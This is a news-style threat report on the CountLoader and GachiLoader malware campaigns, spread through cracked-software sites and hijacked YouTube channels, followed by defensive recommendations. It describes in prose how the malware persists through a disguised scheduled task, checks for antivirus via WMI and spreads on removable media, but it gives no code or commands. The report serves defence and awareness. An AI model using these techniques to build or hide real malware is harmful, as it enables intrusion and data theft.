Cybercriminals Exploit Cracked Software and YouTube Videos to Spread CountLoader and GachiLoader Malware
Cybersecurity researchers have uncovered a sophisticated campaign leveraging cracked software distribution sites and YouTube videos to disseminate advanced malware loaders, notably CountLoader and GachiLoader. These loaders serve as initial tools in multistage attacks, facilitating access, evasion, and the delivery of additional malicious payloads.
CountLoader’s Evolution and Distribution Tactics
CountLoader, a modular and stealthy loader, has been active since at least June 2025. Initially documented by Fortinet and Silent Push, it has been associated with deploying various payloads, including Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The latest iteration, CountLoader 3.2, exhibits enhanced capabilities and a more sophisticated distribution mechanism.
The infection chain begins when users attempt to download cracked versions of legitimate software, such as Microsoft Word. These attempts redirect them to MediaFire links hosting malicious ZIP archives. Within these archives are encrypted ZIP files accompanied by Microsoft Word documents containing passwords to unlock the second archive. Once extracted, the payload includes a renamed legitimate Python interpreter (Setup.exe) configured to execute a malicious command via mshta.exe, retrieving CountLoader 3.2 from a remote server.
To establish persistence, CountLoader creates a scheduled task mimicking legitimate processes, named GoogleTaskSystem136.0.7023.12, set to run every 30 minutes for a decade. It also checks for the presence of security tools like CrowdStrike’s Falcon by querying the antivirus list through Windows Management Instrumentation (WMI). If detected, the malware adjusts its execution method to evade detection.
CountLoader’s capabilities include:
– Downloading and executing executables from specified URLs.
– Retrieving ZIP archives containing Python modules or executables for execution.
– Downloading and running DLLs via rundll32.exe.
– Installing MSI packages.
– Removing its own scheduled tasks to evade detection.
– Collecting and exfiltrating extensive system information.
– Spreading via removable media by creating malicious shortcuts (LNK files) that execute both the original file and the malware.
– Executing remote PowerShell payloads in memory.
In observed attacks, CountLoader ultimately deploys ACR Stealer, an information-stealing malware designed to harvest sensitive data from infected systems. This campaign underscores CountLoader’s ongoing evolution and increased sophistication, highlighting the need for proactive detection and layered defense strategies.
GachiLoader’s Deployment via YouTube Videos
Concurrently, researchers have identified a new, heavily obfuscated JavaScript malware loader named GachiLoader, distributed through a network of compromised YouTube accounts. This method represents a significant shift in malware distribution tactics, exploiting the trust and reach of popular video-sharing platforms.
The attack begins with cybercriminals hijacking legitimate YouTube accounts, often those with substantial followings, to upload videos promoting cracked software or other enticing content. These videos include links in their descriptions, directing viewers to malicious websites hosting GachiLoader.
Upon visiting these sites, users are prompted to download files purportedly related to the video’s content. These files, often disguised as installers or updates, contain heavily obfuscated JavaScript code designed to evade detection by traditional security measures. Once executed, GachiLoader initiates a multistage infection process, downloading and executing additional payloads tailored to the attacker’s objectives.
The use of YouTube as a distribution vector allows attackers to reach a broad audience quickly, leveraging the platform’s credibility to lower users’ guard. This method also complicates detection and takedown efforts, as the malicious content is hosted on a legitimate and widely trusted platform.
Mitigation Strategies and Recommendations
The emergence of CountLoader and GachiLoader highlights the evolving tactics of cybercriminals and the increasing sophistication of malware distribution methods. To mitigate the risks associated with these threats, users and organizations should adopt the following strategies:
1. Exercise Caution with Software Downloads: Avoid downloading software from unverified sources, especially cracked versions of legitimate applications. Always obtain software from official websites or trusted vendors.
2. Be Wary of Links in Video Descriptions: Exercise caution when clicking on links provided in video descriptions, even on reputable platforms like YouTube. Verify the legitimacy of the source before proceeding.
3. Implement Robust Security Solutions: Utilize comprehensive security software capable of detecting and mitigating advanced threats. Ensure that all security tools are up to date and configured correctly.
4. Regularly Update Systems and Software: Keep operating systems, applications, and security software updated to protect against known vulnerabilities.
5. Educate Users on Cybersecurity Best Practices: Provide training and resources to help users recognize phishing attempts, suspicious links, and the risks associated with downloading unverified software.
6. Monitor for Unusual Activity: Implement monitoring solutions to detect anomalies in system behavior, such as unexpected scheduled tasks or unauthorized network connections.
By adopting these measures, individuals and organizations can enhance their defenses against the sophisticated and evolving threats posed by malware loaders like CountLoader and GachiLoader.
